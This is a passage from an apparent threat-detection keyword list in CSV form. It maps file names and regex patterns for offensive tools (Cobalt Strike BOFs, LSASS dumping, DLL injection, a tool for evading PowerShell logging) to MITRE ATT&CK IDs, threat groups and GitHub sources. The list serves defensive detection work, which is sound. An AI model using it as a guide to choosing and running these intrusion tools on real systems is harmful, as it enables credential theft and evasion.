T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*bof_allocator*",".{0,1000}bof_allocator.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bof_helper.py*",".{0,1000}bof_helper\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) Creation Helper","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dtmsecurity/bof_helper","1","1","N/A","10","10","210","46","2022-05-03T18:56:14Z","2020-07-01T14:50:29Z" "*bof_net_user.c*",".{0,1000}bof_net_user\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","413","92","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" "*bof_net_user.o*",".{0,1000}bof_net_user\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","413","92","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" "*bof_pack.py *",".{0,1000}bof_pack\.py\s.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py 
from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*bof_reuse_memory*",".{0,1000}bof_reuse_memory.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*BOF2shellcode*",".{0,1000}BOF2shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","POC tool to convert CobaltStrike BOF files to raw shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FalconForceTeam/BOF2shellcode","1","1","N/A","10","10","161","27","2021-11-05T18:37:53Z","2021-11-05T14:29:57Z" "*bof2shellcode.py*",".{0,1000}bof2shellcode\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","POC tool to convert CobaltStrike BOF files to raw shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/FalconForceTeam/BOF2shellcode","1","1","N/A","10","10","161","27","2021-11-05T18:37:53Z","2021-11-05T14:29:57Z" "*BOF-DLL-Inject*",".{0,1000}BOF\-DLL\-Inject.{0,1000}","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","10","10","144","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z" "*bofentry::bof_entry*",".{0,1000}bofentry\:\:bof_entry.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 
- T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","1","N/A","10","10","221","23","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z" "*BOF-ForeignLsass*",".{0,1000}BOF\-ForeignLsass.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","10","10","98","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z" "*bofhound 
--*",".{0,1000}bofhound\s\-\-.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*bofhound -i *",".{0,1000}bofhound\s\-i\s.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*bofhound -o *",".{0,1000}bofhound\s\-o\s.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*bofhound-main*",".{0,1000}bofhound\-main.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*BOF-IShellWindows-DCOM.*",".{0,1000}BOF\-IShellWindows\-DCOM\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - 
T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","318","52","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" "*BofLdapSignCheck*",".{0,1000}BofLdapSignCheck.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","161","24","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" "*bofloader.bin*",".{0,1000}bofloader\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","POC tool to convert CobaltStrike BOF files to raw shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FalconForceTeam/BOF2shellcode","1","1","N/A","10","10","161","27","2021-11-05T18:37:53Z","2021-11-05T14:29:57Z" "*BOFMask-main*",".{0,1000}BOFMask\-main.{0,1000}","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","10","2","100","23","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z" "*bofnet*SeriousSam.*",".{0,1000}bofnet.{0,1000}SeriousSam\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon 
Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*BOFNET.Bofs*",".{0,1000}BOFNET\.Bofs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*BOFNET.Bofs.Jobs*",".{0,1000}BOFNET\.Bofs\.Jobs.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*bofnet.cna*",".{0,1000}bofnet\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*bofnet.cna*",".{0,1000}bofnet\.cna.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*BOFNET.csproj*",".{0,1000}BOFNET\.csproj.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*BOFNET.dll*",".{0,1000}BOFNET\.dll.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 